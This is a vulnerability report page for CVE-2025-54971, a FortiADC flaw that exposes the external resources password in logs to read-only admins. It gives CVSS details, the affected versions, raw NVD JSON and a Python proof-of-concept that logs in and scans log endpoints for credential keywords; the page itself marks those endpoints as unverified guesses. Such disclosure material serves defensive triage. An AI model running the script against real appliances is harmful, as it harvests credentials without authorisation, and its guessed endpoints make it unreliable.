Security Vulnerability Report
CVE-2025-54971 CVSS 4.3 MEDIUM

CVE-2025-54971

Published: 2025-11-18 17:16:04
Last Modified: 2025-11-20 14:33:10

Description

An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product. (The raw NVD record below classifies the weakness as CWE-532, insertion of sensitive information into a log file, with CWE-200 as the secondary classification.)

CVSS Details

CVSS Score
4.3 — this is the score marked "Secondary" in the raw JSON below; the score marked "Primary" there is 6.5, because that assessment rates the confidentiality impact as High (C:H) rather than Low (C:L). Triage against the higher score if a leaked external-resource password would give access to further systems.
Severity
MEDIUM (both assessments)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (secondary); CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (primary)

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* - VULNERABLE
FortiADC 7.4.0 (note: the NVD CPE match in the raw JSON below spans 6.2.0 up to but excluding 7.4.3, i.e. it also treats 7.4.1 and 7.4.2 as affected — confirm the fixed release against the vendor advisory FG-IR-25-686)
FortiADC 7.2 (all versions)
FortiADC 7.1 (all versions)
FortiADC 7.0 (all versions)
FortiADC 6.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The login and log API paths it uses are not confirmed by the vendor advisory referenced below and may need to be adjusted for a real appliance; a valid read-only admin account is required.
python
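# CVE-2025-54971 PoC - FortiADC Sensitive Information Disclosure
# This PoC demonstrates the information disclosure vulnerability in FortiADC logs
#
# NOTE(review): the login endpoint and the log endpoint paths used below are not
# taken from any vendor documentation visible here; treat them as guesses and
# confirm them against the appliance's actual management API before relying on
# this script. The advisory states that the leaked secret is the "external
# resources password", so the keyword scan below is only a coarse first filter.
import getpass
import sys

import requests
from requests.auth import HTTPBasicAuth  # unused by this script; kept as in the original

# Substrings that flag a log entry as potentially carrying a credential.
# Matched case-insensitively against str(entry); 'key' is deliberately broad
# and will produce some false positives, which is preferable to missing a hit.
SENSITIVE_KEYWORDS = ('password', 'secret', 'key', 'credential', 'token')

# Log endpoints queried after authentication (unverified, see NOTE above).
LOG_ENDPOINTS = [
    "/api/v1/log/system",
    "/api/v1/log/debug",
    "/api/v1/system/logs",
    "/api/v1/dashboard/log",
]

# Per-request timeout in seconds, applied to the login POST and every log GET.
REQUEST_TIMEOUT = 10


def _entries_from_response(data):
    """Return the list of log entries carried by a decoded JSON log response.

    Accepts either a mapping with a ``logs`` key or a bare list. Any other
    shape yields an empty list so an unexpected payload is skipped rather
    than crashing the scan (the original assumed a dict and raised otherwise).
    """
    if isinstance(data, dict):
        entries = data.get('logs', [])
        return list(entries) if isinstance(entries, (list, tuple)) else []
    if isinstance(data, (list, tuple)):
        return list(data)
    return []


def _find_sensitive_entries(entries, keywords=SENSITIVE_KEYWORDS):
    """Return the entries whose ``str()`` form contains any keyword (case-insensitive).

    Pure function: no I/O, so it can be tested without an appliance.
    """
    found = []
    for entry in entries:
        text = str(entry).lower()
        if any(keyword in text for keyword in keywords):
            found.append(entry)
    return found


def _login(session, base_url, username, password):
    """POST the credentials to the (assumed) login endpoint; True on HTTP 200.

    Raises requests.exceptions.RequestException on transport errors; the
    caller decides how to report them.
    """
    login_url = f"{base_url}/api/v1/login"
    response = session.post(
        login_url,
        json={"username": username, "password": password},
        timeout=REQUEST_TIMEOUT,
    )
    return response.status_code == 200


def exploit_fortiadc_sensitive_info(base_url, username, password, *, verify=False):
    """
    Exploit CVE-2025-54971: Sensitive information disclosure via logs
    Requires: Valid admin account with read-only permissions

    Args:
        base_url: Scheme and host of the FortiADC management interface,
            e.g. ``https://fortiadc.local``; a trailing slash is tolerated.
        username: Read-only admin account name.
        password: That account's password.
        verify: TLS certificate verification for every request in the
            session. Defaults to False to match the original PoC (appliances
            commonly present self-signed certificates). Pass True whenever the
            host certificate can be validated: the admin credentials travel
            over this session, and with verification off any on-path attacker
            can capture them.

    Returns:
        The list of log entries that matched a credential keyword, or None if
        authentication failed, the login request failed, or nothing matched.
        A failed request against one log endpoint is reported and skipped so
        findings from the other endpoints are not discarded.
    """
    base_url = base_url.rstrip("/")
    print(f"[*] Targeting FortiADC at {base_url}")
    print(f"[*] Authenticating with user: {username}")

    session = requests.Session()
    # Apply the verification choice to the whole session. The original passed
    # verify=False only on the login POST, so the subsequent log GETs still
    # verified the certificate and failed against a self-signed appliance.
    session.verify = verify

    # Step 1: Authenticate with read-only admin account
    try:
        if not _login(session, base_url, username, password):
            print("[-] Authentication failed")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None
    print("[+] Authentication successful")

    # Step 2: Access logs containing sensitive information
    # The vulnerability allows read-only admins to view logs with credentials
    sensitive_info = []
    for endpoint in LOG_ENDPOINTS:
        print(f"[*] Querying {endpoint}...")
        try:
            response = session.get(f"{base_url}{endpoint}", timeout=REQUEST_TIMEOUT)
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
            continue
        if response.status_code != 200:
            continue
        try:
            data = response.json()
        except ValueError:
            # A 200 with a non-JSON body (e.g. an HTML page) is not a log listing.
            print(f"[-] {endpoint} returned a non-JSON body, skipping")
            continue
        for entry in _find_sensitive_entries(_entries_from_response(data)):
            print("[!] Potential sensitive info found in log entry")
            sensitive_info.append(entry)

    if not sensitive_info:
        print("[-] No sensitive information found in accessible logs")
        return None
    print(f"\n[+] Found {len(sensitive_info)} potential sensitive information entries")
    for info in sensitive_info:
        print(info)
    return sensitive_info


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> [<password>]")
        print(f"Example: python {sys.argv[0]} https://fortiadc.local admin")
        print("If <password> is omitted it is prompted for interactively.")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    # Prefer the prompt: a password given on the command line is visible to
    # other users via `ps` and is written to shell history.
    if len(sys.argv) > 3:
        pwd = sys.argv[3]
    else:
        pwd = getpass.getpass(f"Password for {user}: ")
    exploit_fortiadc_sensitive_info(target, user, pwd)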

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-686 (Vendor Advisory, as listed in the raw NVD record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54971", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:03.680", "lastModified": "2025-11-20T14:33:09.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": 
"31187E7F-51A7-4397-A04A-07F45593E090"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-686", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}